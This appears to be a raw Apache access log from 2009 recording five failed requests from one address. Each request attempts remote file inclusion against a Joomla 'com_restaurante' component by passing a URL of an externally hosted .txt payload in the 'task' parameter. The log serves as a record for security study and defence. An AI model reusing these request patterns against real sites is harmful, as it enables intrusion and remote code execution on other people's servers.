117.110.74.195 - - [12/Aug/2009:07:22:22 -0400] "GET /logs/error_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:22:22 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:22:22 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:22:23 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:22:23 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
